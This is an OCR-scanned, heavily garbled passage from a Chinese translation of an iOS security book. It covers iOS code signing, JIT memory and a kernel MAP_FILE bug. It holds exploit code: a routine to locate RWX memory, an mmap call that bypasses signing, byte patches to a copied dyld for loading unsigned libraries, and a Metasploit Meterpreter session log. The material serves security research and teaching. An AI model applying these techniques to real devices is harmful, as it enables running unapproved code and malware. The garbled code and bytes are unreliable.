核 中 可 以 创建 或 修改 内 存 区 域 权限 的 所 有 位 置 都 具有 代码 。 例 如 , 在 分 配 虚拟 地 址 映射 范围 时 要 





用 到 的 vm_map_enter 中 ， 我 们 可 以 看 到 




















EXECUT 





&& !(flags & 








已) 





#if CONFIG EMBEDDED 
if (cur_protection & VM PROT WRITE)T{ 
if ((cur_protection & VM PROT . 
VM_FLAGS_MAP_JIT))I{ 





printf ("EMBEDDED: %Ss 
writetexecute 
PR 

















} 
1 


#endif /* CONFIG I EpD: */ 





EMBI 





EDD 








Curprot cannot be 
turning off execute\n", 


ETTY_ FUNCTION  ); 
Cur_protection &= ~VM_ PROT 


EXECUTE ; 























这 说 明 ， 如 果 要 求 页 是 可 写 、 可 执行 而 ] 


日 不 能 进行 即时 编译 的 ,我们 就 不 要 让 它 成 为 可 执行 


页 。 此 外 ， 在 用 于 修改 地 址 区 域 权限 的 vm_map_protect 中 ， 我们 基本 上 也 会 看 到 相同 的 情况 : 









































#if CONFIG EMBEDDED 
if (new_ prot & VM PROT WRITE) { 

IE ((new _ prot & VM PROT EXECUTE) && 
! (current->used for jit)) { 

printf ("EMBEDDED: %s can't have both write 

and exec at the same time\n", 

__FUNCTION  ); 

new_prot &= ~VM_ PROT EXECUTE; 














} 
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#endif 

在 这 两 种 情况 中 ， 内 核 都 会 限制 内 存 区域 , 不 让 它们 成 为 可 执行 和 可 写 的 ， 而 进行 即使 编译 
的 情况 除外 。 不 出 所 料 ， 上 面 两 端 代码 片段 在 越狱 过 程 中 都 会 被 打上 补丁 。 第 10 章 将 会 更 为 详细 
地 讨论 越狱 。 


4.6 探索 动态 代码 签名 


从 iOS 2.0 引 入 代码 签名 起 ， 直 到 iOS 4.3, 我 们 已 经 全 面 介绍 了 代码 签名 机 制 。 所 有 的 代码 都 
需要 经 过 签名 ,未 签名 的 内 存 都 是 不 可 以 执行 的 。 不 过 , 这 种 严格 的 代码 签名 策略 就 对 即时 编译 
(JIT ) 这 样 的 技术 判 了 死刑 ， 而 即时 编译 可 以 让 字 节 码 解释 器 运行 得 更 快 。 因 为 很 多 JavaScript 
解释 器 利用 了 即时 编译 ， 所 以 苹果 公司 在 让 MobileSafari 能 运行 得 更 快 和 完全 控制 所 有 可 执行 代 
码 之 间 选 择 了 前 者 。 在 iOS 4.3 中 ， 苹 果 公 司 引 入 了 动态 代码 签名 的 概念 ， 以 允许 使 用 即时 编译 。 

为 了 运行 得 更 快 , 字 节 码 解释 器 会 使 用 即时 编译 确定 字 节 码 试图 运行 什么 机 器 码 , 把 这 些 机 
右 码 写 入 缓冲 区 ， 将 其 标记 为 可 执行 ， 然 后 用 处 理 器 执行 这 些 机 器 码 。 对 既 有 的 iOS 代 码 签名 机 
制 而 言 , 这 是 不 可 能 实现 的 。 为 了 允许 使 用 即时 编译 , 同时 保留 原 有 代码 签名 模式 的 大 部 分 安全 
性 ， 苹 果 公 司 选 择 了 折 中 方案 。 它 只 允许 特定 进程 ( 例如 MobileSafari ) 创建 可 写 旦 可 执行 的 内 
存 区 域 来 执行 即时 编译 工作 。 此 外 , 该 进程 只 能 创建 一 块 这 样 的 区 域 。 任 何 创建 额外 的 可 写 且 可 
执行 区 域 的 尝试 都 是 行 不 通 的 。 




















































































































4.6.1 MobileSafari 的 特殊 性 
大 家 可 以 利用 之 前 介绍 过 的 1daiaq 查 看 MobileSafari 被 授予 的 特殊 特权 一 一 动态 代码 签名 : 


# ldid -e /Applications/MobileSafari .app/MobileSafari 
<?xml] version="1.0" encoding="UTF-8"?> 
<!IDOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 
"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 
<dict> 
<key>com.apple.coreaudio.allow-amr-decode</key> 
<true/> 
<key>com.apple.coremedia.allow-protected-content-playback</key> 
<true/> 
<key>com.apple.managedconfiguration.profiled-access</key> 
<true/> 
<key>com.apple.springboard.opensensitiveurl</key> 
<true/> 
<key>dynamic-codesigning</key> 
<true/> 








<key>keychain-access-groups</key> 

<array> 
<string>com.apple.cfnetwork</string> 
<string>com.apple.identities</string> 
<string>com.apple.mobilesafari</string> 

</array> 
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<key>platform-application</key> 
<true/> 
<key>seatbelt-profiles</key> 
<array> 
<string>MobileSafari</string> 
</array> 
</dict> 
</plist> 


有 具备 此 特权 的 可 执行 文件 才 可 以 创建 这 些 特殊 区 域 ， 而 且 只 有 MobileSafari 才 具备 此 特 





权 。 








看 看 WebKit 的 源 代码 你 就 能 发 现 即 时 编译 空间 的 分 配 。 也 就 是 说 ， 在 JavaScriptCore 中 ， 我 
们 在 ExecutableAllocatorFixedVMPool.cpp 文 件 里 可 以 看 到 这 种 分 配 。 


#define MMAP_FLAGS (MAP_PRIVATE | MAP_ANON | MAP_JIT) 














// 利用 如 下 方式 ， 构 造 要 分 配 到 的 地 址 : 
// 17 位 的 0， 留 在 用 户 空间 中 
// 26 位 随机 安排 ， 对 应 RSLR 
// 21 位 的 0， 保 证 至 少 在 分 页 表 一 级 保持 对 齐 
// 
// 不 过 | 一 一 作为 针对 某 些 桂 件 问题 (rdar://problem/6812854) 的 临时 变通 方案 ， 
// 目前 没有 使 用 2^26 位 的 ASLR， 而 是 使 用 25 位 的 随机 数字 加 上 2^24， 
// 这 样 应 该 会 落 在 用 户 空 间 中 (地址 范围 是 0x200000000000 到 0x5fffffffffff) 
intptr_t randomLocation = 0; 
#if VM _ POOL ASLR 
randomLocation = arc4random() & ((1 << 25) - 1); 
randomLocation += (1 << 24); 
randomLocation <<= 21; 





#endif 
m base = mmap (reinterpret cast<void*> (randomLocation), 
m totalHeapSize, INITIAL PROTECTION_ FLAGS, MMAP_FLAGS, 
VM_TAG_FOR_EXECUTABLEALLOCATOR MEMORY, 0); 


要 了 解 实际 的 调用 情况 ， 我 们 就 要 在 mmap 中 设置 断 点 ， 满 足 保护 标志 是 可 读 、 可 写 且 可 是 
执行 的 (RWX ) 这 一 条 件 ， 例 如 假设 保护 标志 ( 存放 在 r2 中 ) 是 0x7。 


(gdb) attach MobileSafari 
Attaching to process 17078. 






































(gdb) break mmap 

Breakpoint 1 at 0x341565a6 

(gdb) condition 1 Sr2==0x7 

(gdb) c 

Continuing. 

Reading symbols for shared libraries . done 
Reading symbols for shared libraries . done 
Reading symbols for shared libraries . done 
[Switching to process 17078 thread 0x2703] 


Breakpoint 1, 0x341565a6 in mmap () 


(gdb) i r 
r0 0x0 0 
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a 0x1000000 16777216 
r2 0x7 
天 3 0x1802 6146 


因此 , MobileSafari 调 用 mmap, 请 求 一 块 标志 为 0x1802、 大 小 为 0x1000000( 16 MB ) 的 RWX 
区 域 。 看 看 iOS SDK 中 的 mman.h 文 件 你 就 会 发 现 ， 该 值 表示 设置 了 MAP_PRIVATE、MAP_JIT、 
MAP_ANON 这 些 位 ， 因 为 JavaScriptCore 的 源 代 码 表明 了 这 一 点 。 而 z0 为 零 也 说 明 VM_POOL_ASLR 
肯定 还 未 定义 , 因此 该 即时 编译 缓冲 区 的 位 置 完全 依赖 于 iOS 堆 的 ASLR。 所 传递 的 标志 中 最 有 意 
思 的 是 MAP_JIT， 它 是 按 如 下 方式 定义 的 : 


define MAP_FILE 0x0000 
define MAP_JIT 0x0800 
/* 分 配 用 于 JI 的 区 域 */ 


大 家 已 经 看 到 这 种 分 配 是 如 何 进行 的 了 ， 现 在 我 们 再 来 看 看 内 核 是 如 何 处 理 这 一 特殊 标 
志 的 。 














4.6.2 ”内 核 如 何 处 理 即时 编译 
XNU 中 的 mmap 如 下 所 示 ， 它 位 于 bsd/kern/kern_mman.c 文 件 中 ， 包 含 一 行 代 码 ， 也 就 是 
PRIVATE | ANON 映 射 ， 确 保 只 有 MobileSafari 进 行 的 即时 编译 分 配 才 被 认可 : 


int 
mmap(proc t p, struct mmap_args *uap, user addr 七 *retval) 








if ((flags & MAP_JIT) && ((flags & MAP_FIXED) || (flags & 
MAP_SHARED) || (flags & MAP_FILE) ) ) { 
return EINVAL; 








} 
有 了 时候， 我 们 之 后 还 检查 是 否 有 适当 的 特权 : 








if (flags & MAP_ ANON) { 
maxprot = VM_ PROT_ALL; 
#if CONFIG MACF 
error = mac proc_ check map_anon(p, user_addr, 
user_size, prot, flags, &maxprot); 








if (error) { 
return EINVAL; 





} 


这 一 检查 的 反 编译 代码 如 图 4-9 所 示 。 
继续 看 mmap 函 数 ， 你 会 看 到 对 MAP_JIT 标 志 的 处 理 : 

















if (flags & MAP_ JIT) { 
alloc_flags 全 VM_FLAGS_MAP_JIT; 
} 
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result = vm_map_enter_mem_object_control(...，alloc flags, ...); 

















图 4-9 ”amfi_proc_check_map_anon 的 反 编译 代码 








该 函数 是 在 osfmk/vm/vm_map .c 文 件 中 定义 的 : 


kern _ return 七 
vm map_enter mem object_ control(...int flags, 
vm prot _t cur protection,...) 





result = vm map_enter(..., flags, ...cur protection,...); 


最 后 ， 在 vm_map_enter 中 你 义 会 看 到 上 一 节 中 的 检查 : 


kern _ return 七 
vm map_enter(...int flags, ... vm prot t cur protection,...) 








#if CONFIG EMBEDDED 
if (cur_protection & VM PROT WRITE)T{ 
if ((cur_protection & VM PROT EXECUTE) && 
! (flags & VM FLAGS_ MAP_JIT)){ 
printf ("EMBEDDED: %s curprot cannot be 
writet+execute. turning off executeNn" ， 
__PRETTY_FUNCTION  ); 
cur_protection &= ~VM PROT EXECUTE; 
























































} 
} 
#endif /* CONFIG _ EMBEDDED */ 


这 一 检查 说 明 ， 除 非 内 存 设 置 了 即时 编译 标志 ， 和 否则 内 存 不 可 能 是 可 写 且 可 执行 的 。 因 此 ， 























你 只 有 在 到 达 这 有 段 设置 了 即时 编译 标志 的 代码 时 ， 才 可 以 具有 可 执行 可 写 的 区 域 。 








之 前 给 出 的 代码 说 明 通 过 使 用 特殊 mmap 标 志 ， 我 们 可 以 只 允许 带 有 动态 代码 签名 特权 的 进 








旦 分 配 可 写 且 可 执行 内 存 。 现在 来 看 看 负责 防止 多 次 使 用 该 标志 的 代码 。 这 样 我 们 可 以 防止 具有 


该 特权 的 进程 ( 比如 MobileSafari ) 在 被 攻击 之 后 允许 攻击 者 调用 具有 MAP_JIT 标 志 的 mmap 为 他 
们 的 shellcode 分 配 新 的 可 写 且 可 执行 区 域 。 
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我 们 对 单一 区 域 的 检查 也 是 在 vm_map_enter 函 数 中 执行 的 : 


if ((flags & VM FLAGS MAP JIT) && (map->jit_ entry exists))t{ 
result = KERN_INVALID ARGUMENT; 
goto BailOut; 








} 


if (flags & VM FLAGS MAP_JIT)T{ 
if (! (map->jit_entry_exists))t{ 
new_entry->used_ for_ jit = TRUE; 
map->jit_entry_exists = TRUE; 


| 








} 
} 


因此 ， 虚 拟 内 存 进程 映射 表 中 的 一 个 标志 存储 相应 信息 ， 说 明 是 否 已 经 映射 过 设置 了 
VM_FLAGS_MAP_JIT 标 志 的 区 域 。 如 果 你 已 经 设置 了 该 标志 , 就 无 法 分 配 男 一 个 这 样 的 区 域 。 该 
标志 是 无 法 ( 比如 通过 重新 分 配 该 区 域 ) 清除 的 。 因 此 , 想 要 在 MobileSafari 中 执行 shellcode 的 攻 
击 者 不 可 能 自行 分 配 新 的 内 存 区 域 ， 而 是 必须 找 出 已 经 分 配 的 即时 编译 区 域 并 重用 该 区 域 。 





























4.6.3 MobileSafari 内 部 的 攻击 


编写 复杂 的 ROP 有 效 载荷 是 很 有 难度 的 ， 而 编写 接着 会 执行 shellcode 的 ROP 有 效 载 荷 就 要 简 
单 得 多 。 在 引入 动态 代码 签名 机 制 之 前 ,我 们 不 可 能 注入 并 执行 shellcode， 因 此 整个 有 效 载荷 都 
必须 是 用 ROP 完 成 的 。 现 在 ， 如 果 攻 击 者 可 以 找到 即时 编译 区 域 ， 他 们 就 可 以 将 shellcode 写 和 人 组 
冲 区 并 执行 。 

完成 这 一 切 的 最 简单 方法 可 能 就 是 在 ROP 有 效 载荷 中 复制 以 下 函数 的 行为 。 
































注意 本章 中 的 代码 可 以 从 本 书 配套 网 站 www.wiley.com/go/ioshackershandbook 上 获得 。 


unsigned int find rwx(){ 
task_t task = mach task_ self(); 
mach_ vm address_t address = 1; 


kern_ return t kret; 
vm_region basic_ info data 64 七 info; 
mach vm size t size = 0; 





mach port_t object _ name; 
mach msg_type _ number_t count; 





while( (unsigned int) address != 0){ 





count = VM REGION_BASIC INFO_ COUNT 64; 
kret = mach vm region (task, &address, &size, 
VM_ REGION_BASIC_INFO_ 64, 
(vm_ region info 七 ) &info, 
&count, &object name); 
if(info.protection == 7) 
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return address; 


address += size; 
} 


return 0; 


- 








该 函数 会 寻 遍 所 有 已 分 配 的 内 存 区 域 , 查找 具有 0x7 保 护 ( 即 RWX， 可 读 可 写 且 可 执行 ) 的 
区 域 。 这 里 就 是 有 效 载荷 要 写 入 机 器 码 并 跳 转 到 的 地 址 。 


4.7 ”破坏 代码 签名 机 制 


对 于 其 他 应 用 一 一 那些 不 含 动态 代码 签名 特权 的 应 用 一 一 来 说 , 事情 就 难 办 多 了 。 没有 完整 
的 ROP 有 效 载荷 就 寸步 难 行 。 不 过 , 在 我 们 编写 本 书 的 时 候 ， 人 们 已 经 可 以 为 应 用 创建 可 写 且 可 
执行 的 内 存 区 域 了 。 这 是 因为 内 核对 mmap 中 的 MAP_JIT 标 志 的 检查 机 制 存 在 漏洞 。 

这 是 个 非常 严重 的 bug， 因 为 除了 让 攻击 者 可 以 提供 shellcode 有 效 载 荷 ， 还 允许 下 载 自 苹果 
App Store 的 应 用 运行 未 经 苹果 公司 审核 的 任意 代码 。 利 用 这 个 诡计 的 应 用 可 以 动态 地 创建 可 写 且 
可 执行 的 区 域 ,下 载 任何 想 要 下 载 的 代码 ,将 这 些 代 码 写 入 缓冲 区 ,然后 执行 它们 。 这 完全 绕 过 
了 App Store 为 防范 恶意 软件 而 采取 的 控制 。 

该 bug 就 存在 于 以 下 这 段 本 章 之 前 已 经 讨论 过 的 代码 中 《〈 那 时 候 你 发 现 问题 了 吧 ? )。 


if ((flags & MAP_JIT) && ((flags & MAP_FIXED) || 
(flags & MAP_ SHARED) (flags & MAP_ FILE))){ 
return EINVAL; 






































} 
问题 在 于 MAP_FILE 被 定义 为 0 了 。 因 此 ， 对 flags & MAP_FILE 的 检查 是 无 意义 的 ， 因 为 它 的 
结果 总 为 0%， 所 以 实际 上 就 什么 也 没有 检查 。 我 们 来 看 看 证 明 这 一 点 的 反 汇编 过 程 ( 见 图 4-10 )。 


























图 4-10 ”应 该 是 只 有 在 设置 了 MAP_ANON 标 志 时 才 执 行 JIT_FLAG 的 代码 
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它 会 对 JIT_FLAG 进 行 检 查 ， 人 然后 检查 MAP_FIXED & MAP_SHARED。 
这 意味 着 ， 如 果 MAP_JIT、MAP_PRIVATE 和 MAP_FILE 标 志 都 已 设置 ， 这 一 检查 就 没 法 阻止 
对 mmap 的 调用 。 接 着 ， 出 于 某 种 原因 ， 验 证 该 应 用 的 检查 就 具有 了 合适 的 特权 ， 并 且 只 为 匿名 
( 也 就 是 那些 设置 了 MAP_ANON 标 志 ) 的 映射 执行 检查 。 

因此 任何 (之 前 未 创建 RWX 区 域 的 ) iOS 进 程 都 可 以 执行 如 下 调用 : 


char *x = (char *) mmap(0, any_size, PROT_ READ | PROT_WRITE 
PROT_EXEC, MAP_JIT | MAP_PRIVATE | MAP_FILE, some valid fd, 0); 


这 样 就 会 给 进程 返回 一 个 任意 大 小 的 可 读 、 可 写 而 且 可 执行 的 区 域 。 






































4.7.1 ”修改 iOS shellcode 


至 此 ， 应 用 攻击 者 就 知道 要 么 可 以 重用 已 经 存在 的 即时 编译 区 域 ( 如 果 攻 击 的 是 
MobileSafari )， 要 么 可 以 用 ROP 创 建 一 个 这 样 的 区 域 (如果 攻 击 的 是 MobileSafari 以 外 的 应 用 , 或 
者 是 利用 了 这 一 缺陷 的 AppStore 亚 意 软件 ), 然后 , 该 攻击 者 就 可 以 复制 并 执行 shellcode 了 。 当然 ， 
这 些 shellcode 的 作者 想 让 它们 干什么 都 可 以 。 不 过 ， 如 果 说 编写 ROP 有 效 载荷 很 难 的 话 ， 那 么 编 
写 大 的 shellcode 有 效 载荷 虽然 简单 ， 但 很 烦人 。 如 果 你 可 以 执行 C 语 言 ， 甚 或 是 Objective C 这 种 
更 高 级 语言 的 代码 ， 那 就 更 好 了 。 事 实证 明 ， 只 要 你 有 机 会 写 人 shellcode， 就 基本 上 算是 打破 了 
设备 上 的 代码 签名 机 制 ， 因 为 利用 shellcode 加 载 未 签名 的 库 文 件 并 不 是 很 难 。 

大 家 有 既 可 以 自己 编写 代码 链接 器 , 也 可 以 试 着 重用 和 滥用 已 经 存在 的 代码 链接 器 。 这 里 我 们 
就 后 一 种 方法 来 看 一 个 例子 。 已 经 存在 的 动态 链接 器 dylg 会 为 某 个 库 分 配 空间 ， 然 后 加 载 、 链 
接 并 运行 该 库 。 我 们 需要 为 该 动态 链接 器 打上 补丁 , 从 而 在 新 分 配 的 未 应 用 代码 签名 法 则 的 RWX 
区 域 加 载 新 代码 。 直 接 给 ayla 打 补丁 是 不 行 的 ， 因 为 这 样 会 让 该 页 的 动态 代码 签名 失效 ， 可 行 
的 做 法 是 在 新 建 的 RWX 区 域 中 创建 avla 的 副本 ， 并 在 那里 为 该 副本 打 补 丁 。 

大 家 首先 要 做 的 是 找到 加 载 ayla 的 位 置 ， 因 为 有 地 址 空间 分 布 随机 化 (ASLR ) 机 制 ， 所 以 
这 个 位 置 可 能 千差万别 。 完 成 这 一 任务 有 两 种 可 行 的 方式 。 第 一 种 是 找到 主 可 执行 文件 的 位 置 。 
鉴于 ASLR 的 工作 方式 ， 主 可 执行 程序 当前 位 置 与 它 通 常 所 在 位 置 ( 0x1000 ) 之 间 的 差距 ， 和 任 
何 符号 及 其 自身 预期 位 置 之 间 的 偏 移 量 都 相同 。 因 此 ， 在 这 种 情况 下 ，dylq 与 其 预期 位 置 
( 0x2fe00000 ) 之 间 的 偏 移 量 就 等 于 主 可 执行 程序 与 0x1000 之 间 的 偏 移 量 。 所 以 如 果 我 们 知道 
主 二 进 制 文件 中 任何 符号 的 地 址 ， 就 可 以 计算 出 ayld 的 位 置 。 

另 一 种 方法 ， 也 是 我 们 这 里 要 介绍 的 ， 是 利用 1ipqyld.aylib 中 的 某 些 信息 。 它 含有 一 个 
名 为 nyDyldsection 的 (无 出 口 ) 符号 ， 是 用 来 在 ay1g 中 定位 并 调用 函数 的 。 非 常 巧 合 的 是 ， 
myDyldSection 地 址 的 第 一 个 gworgd 就 是 aylg 的 位 置 。 


































































































(gdb) x/x &myDyldSection 
0x3e781000 <myDyldSection>: 0x2fe2a000 


因为 该 符号 是 无 出 口 的 , 所 以 我 们 需要 在 任 一 库 ( 这 是 因为 它们 的 ASLR 偏 移 量 都 是 相同 的 ) 
中 找 一 个 有 出 口 的 符号 ， 并 计算 myDyldsection 与 该 符号 之 间 的 偏 移 量 。 但 不 巧 的 是 ， 这 样 做 
会 让 有 效 载荷 依赖 固件 版 本 。 还 有 一 点 你 要 记 住 ， 虽然 有 些 麻 烦 ， 但 是 代码 是 用 C 语 言 ( 在 利用 
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应 用 加 载 新 的 未 签名 代码 时 ) 或 shellcode ( 在 进行 漏洞 攻击 时 ) 编写 的 。 不 管 哪 种 情况 ， 写 代码 
都 是 相对 简单 的 。C 语 言 代 码 如 下 所 示 : 
unsigned int *fgNextPIEDylibAddress_ptr; 


unsigned int *ptr_ to_ fgNextPIEDylibAddress_ptr; 
unsigned int next_ mmap; 











/7 

// 硬 编码 的 值 

// 

unsigned int dyld size = 227520; 

unsigned int dyld data start = 0x26000; 
unsigned int dyld data end = 0x26e48; 
unsigned int libdylqd data size = 0xl2b; 
unsigned int diff to myDyldSection = 0xbbc5008; 


// 找到 dyld 

unsigned int myexit = (unsigned int) &exit; 
my_myDyldSection = myexit + diff_ from exit_ to_ myDyldSection; 
unsigned int dyld loc = * (unsigned int *) myDyldSection; 
dylgd_loc -= 0x1000; 


接着 ,我 们 就 可 以 分 配 RWX 区 域 (或 是 找到 已 经 存在 的 RWX 区 域 )。foo 是 要 映射 的 大 文件 
的 名 称 : 


int fd = open("foo", O_RDWR); 

char *x = (char *) mmap(0, Ox1000000, PROT_READ | PROT_ WRITE | 
PROT_EXEC /*0*/, MAP_JIT | MAP_PRIVATE 
MAP_FILE, fd, 0); 


next_mmap 是 该 RWX 缓 冲 区 中 dyla ( 接 下 来 要 复制 的 那 部 分 代码 ) 之 后 的 那个 位 置 。 
next_mmap 就 是 为 qy1d 打 补丁 以 便 加 载 下 一 个 库 的 地 方 。 


memcpy (x, (unsigned char *) dyld loc, dyld size); 
next_ mmap = (unsigned int) x + dyld size; 


现在 你 就 有 可 供 修改 的 dyld 可 执行 副本 了 。 除 了 打上 要 打 的 补丁 ， 你 还 需要 进行 一 些 其 他 
修复 。dy1ld 的 数据 部 分 中 含有 很 多 指向 自己 的 函数 指针 。 这 就 意味 着 如 果 你 在 这 个 dayld 的 副本 
中 调用 某 个 函数 , 结果 可 能 是 调用 存储 在 那里 的 一 个 函数 指针 , 并 最 终 在 原始 (未 打 补 丁 ) 的 ayla 
中 执行 代码 。 为 了 防止 出 现 这 种 情况 ， 你 要 依次 修改 该 aylg 副 本 的 数据 部 分 中 指向 它 自身 的 函 
数 指针 : 


// 将 data 指 针 指 向 新 位 置 




















I 




















unsigned int *data ptr = (unsigned int *) (x + dyld data start); 
while(data ptr < (unsigned int *) (x + dyld data end))t 
If ( (*data ptr >= dylqd loc) && (*data ptr < dyld loc +dyld size))f{ 
unsigned int newer = (unsigned int) x + (*data ptr - dylgd loc); 


*data_ ptr = newer; 
} 
data_ptr++; 
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libdyld 也 含有 很 多 指向 dy1ld 的 函数 指针 。 其 他 代码 可 能 调用 1ibayld 以 调用 ayla 中 的 也 
数 。 如 果 你 调用 的 是 原始 的 ayla， 就 会 因为 副本 dylq 并 未 更 新 原始 数据 结构 造成 一 致 性 问题 。 
因此 ， 这 里 要 依次 修改 1ibqy1d 数 据 部 分 中 所 有 指向 ay1dq 副 本 的 另 数 指针 。 


unsigned int libdyld data start = myDyldSection; 
// 将 lipdyld data 指 针 改 为 指向 新 位 置 





dqata_ptr = (unsigned int *) libdylqd data start; 
while(data ptr < (unsigned int *) (libdyld data start +libdyld data size))t 
if ( (*data ptr >= dyld loc) && (*data ptr < dylqd loc + dyld size))f{ 
unsigned int newer = (unsigned int) x + (*data ptr - dylqd loc); 


*data_ptr = newer; 
} 
data_ptr++; 
} 


经 过 这 些 修正 ， 新 的 ay16 副 本 应 该 能 起 作用 了 。 现 在 ,我 们 只 需要 为 它 打 上 补丁 ， 以 便 能 
向 创建 的 RWX 区 域 中 加 载 库 ， 而 且 就 算 这 些 库 是 未 签名 的 ， 它 们 也 应 该 是 可 以 执行 的 。 这 要 求 4 
个 小 补丁 。 第 一 个 补丁 涉及 fgNextPIEDylibaddress_ptr。 该 指针 指向 ayla 中 的 位 置 ， 其 中 
存储 着 下 一 个 库 的 加 载 位 置 。 这 里 我 们 希望 将 其 设置 给 变量 next_mmap: 




















// 

// 补丁 1: 设置 ptr_to_fgNextPIEDylibAddress 和 fgNextPIEDylibAddress_ptr 

人/ 

ptr_to_fgNextPIEDylibAddress ptr = (unsigned int *) (x + 0x2604c); 
fgNextPIEDylibAddress _ ptr = (unsigned int *) (x + 0x26320); 
*ptr_to_fgNextPIEDylibAddress_ ptr = (unsigned int) fgNextPIEDylibAddress ptr; 





*fgNextPIEDylibAddress_ptr = next_mmap; 
接 下 来 的 补丁 打 在 如 下 所 示 来 自 ayla 的 函数 上 : 


uintptr_t ImageLoaderMachO::reserveAnAddressRange (size t length, 
const ImageLoader: :LinkContext& context) 
{ 
vm_address_t addr = 0; 
vm_size _t size = length; 
// 在 计算 圆周 率 的 PIE 程 序 中 ， 在 主 可 执行 文件 后 载 入 初始 动态 库 ， 
// 这 样 它们 也 就 没有 固定 的 地 址 了 
if ( fgNextPIEDylibAddress != 0 ) { 
// 在 动态 库 之 间 添 加 小 型 (0 到 3 页 ) 随机 填充 
addr = fgNextPIEDylibAddress + 
(__stack chk_ guard/fgNextPIEDylibAddress & 
(sizeof (long)-1))*4096; 











kern return t r = vm allocate(mach task self(), &addr, size, 
VM_FLAGS_FIXED); 





if ( r == KERN_SUCCESS ) { 
fgNextPIEDylibAddress = addr + size; 
return addr; 











} 
fgNextPIEDylibAddress = 0; 
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} 
kern return t r = vm allocate(mach task self(), &addr, size, 
VM_FLAGS_ANYWHERE); 











if ( r != KERN_SUCCESS ) 
throw "out of address space"; 








return addr; 


} 





简单 地 讲 , 该 函数 会 试 着 在 请 求 的 位 置 分 配 一 些 空间 ,而 如 果 这 样 做 行 不 通 的 话 ， 它 就 会 在 


随机 位 置 分 配 一 些 空间 。 如 果 你 是 用 这 个 函数 把 新 的 库 放 入 已 经 存在 的 RWX 区 域 中 ， 那 么 








它 分 


配 空间 的 尝试 就 会 失败 ， 因 为 该 区 域 已 经 被 分 配给 别 的 内 容 了 。 nd 





并 让 函数 返回 ， 就 好 像 它 真 的 在 该 RWX 区 域 中 分 配 了 一 些 空间 。 以 下 补丁 就 会 移 除 该 比较 ， 
样 该 函数 会 忽略 第 一 个 vm_allocate 函 数 的 返回 值 并 直接 返回 adqr: 


VA 

// 补丁 2: 急 略 reserveAnAddressRange 中 的 vmalloc 

ji 

unsigned int patch2 = (unsigned int) x + Oxc9de; 
memcpy ( (unsigned int *) patch2, "\xc0\x46", 2); // thumb nop 





下 一 个 补丁 是 最 复杂 的 。 在 这 个 补 本 里， 我们 要 把 mapsegments 中 对 mmap 的 调用 替换 成 对 
read 的 调用 。 我 们 并 不 是 要 在 文件 中 进行 真正 的 映射 ， 而 只 是 想 将 该 文件 读 入 WX 区 域 。 在 打 




















Ss i 
补丁 之 前 ， 它 是 这 样 的 : 
void ImageLoaderMachO: :mapSegments(int fd, uint64 t offsetInFat, 
uint64 七 lenIinFat, uint64 t fileLen, const LinkContext& context) 
二 
void* loadAddress = mmap( (void*)requestedLoadAddress, size, 
protection, MAP_FIXED | MAP_PRIVATE, fd, fileOffset); 











打上 补丁 之 后 ， 它 就 成 下 面 这 样 了 : 


read(fd, requestedLoadAddress, size); 


实际 的 补丁 如 下 所 示 : 

// 

// 补丁 3: 在 mapSegments 中 的 mmap 

// 

unsigned int patch3 = (unsigned int) x + Oxdd4c; 


memcpy ( (unsigned int *) patch3, 
"\xXO05\x98\x08\x99\x32\x46\x32\x46\x32\x46\x32\x46\x32\x46\x8c\x23 
\x1lb\x02\x45\x33\x1lb\x44\x7b\x44\x98\x47", 26); 


通常 情况 下 ,在 调用 dlopen 之 后 ，fgNextPIEDyl1ipbAddress 会 被 重 置 为 0。 大 家 不 希望 这 

















种 情况 发 生 。 最 后 的 补丁 就 是 让 ImageLoader: :Link 中 负责 重 置 的 代码 不 再 进行 任何 操作 。 
在 你 打 补 丁 之 前 ， 函 数 最 后 是 这 样 的 : 
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// 完成 初始 动态 库 载 入 
fgNextPIEDylibAddress = 0; 





} 
我 们 只 需要 利用 以 下 补丁 让 最 后 一 行 不 进行 任何 操作 就 行 了 : 

















ZY 

// 补丁 4: 在 dlopen 后 不 要 重 置 fgNextPIEDylibAddress 
/7/ 

unsigned int patch4 = (unsigned int) x + 0xbc34; 


memcpy( (unsigned int *) patch4, "\xc0O\x46", 2); 

现在 就 算是 为 该 ayld 副 本 打 好 补丁 了 ， 它 会 把 库 装载 到 我 们 所 拥有 的 RWX 区 域 中 。 此 外 ， 
因为 我 们 把 1ipay1ld.dylib 中 的 指针 改 为 指向 自己 的 dy1d 副 本 ， 所 以 调用 真正 的 dlopen 或 
dlsym ( 含 在 lipdy1ld 中 ) 的 代码 实际 上 最 终 会 调用 打 过 补丁 的 ay1gd 副 本 ,而 该 副本 是 会 把 库 加 
载 到 所 拥有 的 RWX 区 域 中 的 。 换 句 话 说 ， 在 应 用 了 这 些 补 丁 之 后 ，iOS 应 用 对 dlopen 和 dlsym 
的 调用 就 会 加 载 并 执行 未 签名 的 库 ! 

















4.7.2 在 iOS 上 使 用 Meterpreter 


现在 , 我 们 已 经 很 容易 编写 高 级 语言 库 让 应 用 加 载 或 是 让 漏洞 攻击 利用 了 。 这 些 库 可 能 还 包 

其 他 试图 提升 特权 的 漏洞 攻击 、 嗅 探 网 络 流量 的 有 效 载荷 , 以 及 上 传 地 址 短 内 容 的 代码 , 等 等 。 
1 终 的 有 效 载 荷 是 来 自 Metasploit 框 架 的 Meterpreter。 针 对 ARM 架 构 重 新 编译 Meterpreter, 并 
利用 这 种 方法 加 载 它 并 不 是 很 难 。 这 样 做 的 结果 就 是 在 没有 shell 的 设备 上 获得 类 似 shell 的 交互 体 
验 ! 下 面 摘录 了 一 段 在 工厂 状态 〈 未 配置 ， 未 越狱 ) 的 让 hone 上 运行 Meterpreter 的 状态 记录 。 
(Meterpreter 库 可 以 从 本 书 配套 网 站 www.wiley.com/go/ioshackershandbook 下 载 。) 


$ ./msfcli exploit/osx/test/exploit RHOST=192.168.1.2 RPORT=5555 
LPORT=5555 PAYLOAD=osx/armle/meterpreter/bind tcp DYLIB=metsrv-combo- 

phone.dylib AutoLoadStdapi=False E 

*] Started bind handler 

*] Transmitting stage length value...(3884 bytes) 
] Sending stage (3884 bytes) 

] Sleeping before handling stage... 

] Uploading Mach-Oo dylib (97036 bytes)... 

] 

] 

2. 





























Upload completed. 
Meterpreter session 1 opened (192.168.25.129:51579 -> 
L681.2:5555) 


站 : 入 ”省 羔 不 





19 


meterpreter > use stdapi 
Loading extension stdapi...success. 
meterpreter > ls 





Listing: / 


Mode Size Type Last modified Name 


41775/rwxrwxr-x 714 di Tue Aug 30 05:41 2011 
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41775/rwxrwxr-x 714 dir Tue Aug 
